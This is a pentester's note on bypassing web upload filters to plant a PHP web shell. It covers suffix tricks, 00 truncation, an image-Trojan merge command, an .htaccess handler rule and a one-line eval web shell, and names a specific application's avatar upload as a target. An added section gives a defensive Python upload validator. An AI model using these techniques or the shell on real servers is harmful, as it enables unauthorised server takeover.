Shell upload conditions:
1. An upload point
2. The absolute path
3. Sufficient permissions
Start uploading (try uploading the small web shell first and then the large one, because the large one is sometimes more likely to be caught and deleted)
1. Upload the shell directly, that is, a PHP file (when the file type is not restricted)
2. Change the suffix
Upload a file in an allowed format, such as PNG or JPG, then change the suffix to PHP (when the black/white list is only verified on the front end)
3. Use a parsing vulnerability (that is, append /xx.php after the absolute path of the file)
Upload a file, such as a PNG, and rely on the parsing vulnerability (web servers that have a parsing vulnerability)
4. Unrecognized suffix
Upload, for example, a shell.php.abc file; because the server does not recognize the abc suffix, it looks toward the front of the name for a suffix it can resolve.
5. 00 truncation
Upload a file named like shell.php.jpg, then change the hex value with Burp Suite: find shell.php.jpg in the hex view and replace the value of the second dot (I remember 2e) with 00, then click Forward (to release the packet)
6. Image Trojan ("picture horse")
On Windows, cmd can easily combine a PHP file with a JPG or PNG file, for example copy /b 1.jpg+1.php shell.jpg, which merges the image with the code. This is used because some servers check the image header and refuse the upload if it is not a picture header. Combining the picture and the code can effectively hide the Trojan horse. Do not forget that a PHP file still has to be uploaded here; you can use the methods above
7. .htaccess file attack to upload a shell
The .htaccess file is a configuration file for the Apache server that controls the configuration of the web pages in its directory. Through the .htaccess file you can set up 301 redirects, customize the 404 page, change file extensions, allow or block access for specific users or directories, prohibit directory listings, and configure default documents.
①. Write the .htaccess file
The code needed is as follows:
<FilesMatch "Cimer">
SetHandler application/x-httpd-php
</FilesMatch>
(Through the .htaccess file, this calls the PHP parser to parse any file whose name contains the string "Cimer".)
Then save the file (the original post showed the file name and type in a screenshot)
②. Upload the .htaccess file
③. Change the shell suffix to cimer
④. Then upload shell.cimer
⑤. Then you can connect to it
If this is unclear, see the reference http://www.sohu.com/a/125498727_609556
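As the server-side counterpart to techniques 1 to 7 above, here is an added example (not code from the original post) of an upload check that refuses each of the file-name and content tricks listed. The function names, the allow-list and the sample uploads are assumptions constructed for illustration.

```python
import os
import re
import uuid

ALLOWED_EXT = {"jpg", "jpeg", "png"}   # assumed allow-list for an avatar upload
MAGIC = {"jpg": b"\xff\xd8\xff", "jpeg": b"\xff\xd8\xff", "png": b"\x89PNG\r\n\x1a\n"}
# PHP open tags that have no place inside an image (image Trojan check)
SCRIPT_MARKERS = re.compile(rb"<\?php|<\?=", re.I)

def check_upload(filename: str, data: bytes) -> tuple[bool, str]:
    """Server-side decision for one upload: (accepted, reason)."""
    if "\x00" in filename or "%00" in filename:
        return False, "null byte in name"            # 00 truncation
    name = os.path.basename(filename.replace("\\", "/"))
    if name.startswith("."):
        return False, "dotfile"                      # .htaccess and similar
    parts = name.lower().split(".")
    if len(parts) != 2:
        return False, "need exactly one extension"   # shell.php.abc, shell.php.jpg
    ext = parts[1]
    if ext not in ALLOWED_EXT:
        return False, "extension not allowed"        # shell.php, shell.cimer
    if not data.startswith(MAGIC[ext]):
        return False, "not an image header"
    if SCRIPT_MARKERS.search(data):
        return False, "script marker in image"       # copy /b 1.jpg+1.php
    return True, "ok"

def stored_name(ext: str) -> str:
    """Name chosen by the server, so the client's file name never reaches disk."""
    return f"{uuid.uuid4().hex}.{ext}"

# Constructed sample uploads (placeholder bytes, not real images or shells)
JPG = b"\xff\xd8\xff\xe0" + b"\x00" * 16
PHP = b"<?php /* placeholder */ ?>"
SAMPLES = [
    ("avatar.jpg", JPG), ("shell.php", PHP), ("shell.php.abc", PHP),
    ("shell.php\x00.jpg", JPG), ("shell.jpg", JPG + PHP),
    (".htaccess", b"placeholder"), ("shell.cimer", PHP),
]

if __name__ == "__main__":
    for fname, body in SAMPLES:
        print(repr(fname), check_upload(fname, body))
```

Name and content checks are only one layer: the upload directory should also not execute scripts or honour .htaccess files (in Apache, `AllowOverride None`), which removes the effect of techniques 3 and 7 even if a file slips through.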
There are many upload methods and all kinds of clever ways to bypass checks; what I know is only a drop in the bucket. I record the unusual cases I run into here so that I do not forget them later.
Example: in Pirate Cloud Trader, on the member change-avatar function, capture the packet with Burp Suite and add the file size under Content-Type to get a shell
Or upload a picture and then add the Trojan to it to get a shell (there is one problem here: the one-line shell <?php @eval($_POST['aaa'])?> has no semicolon; there are good points, but it was not successful)
Shell upload Bypass detection method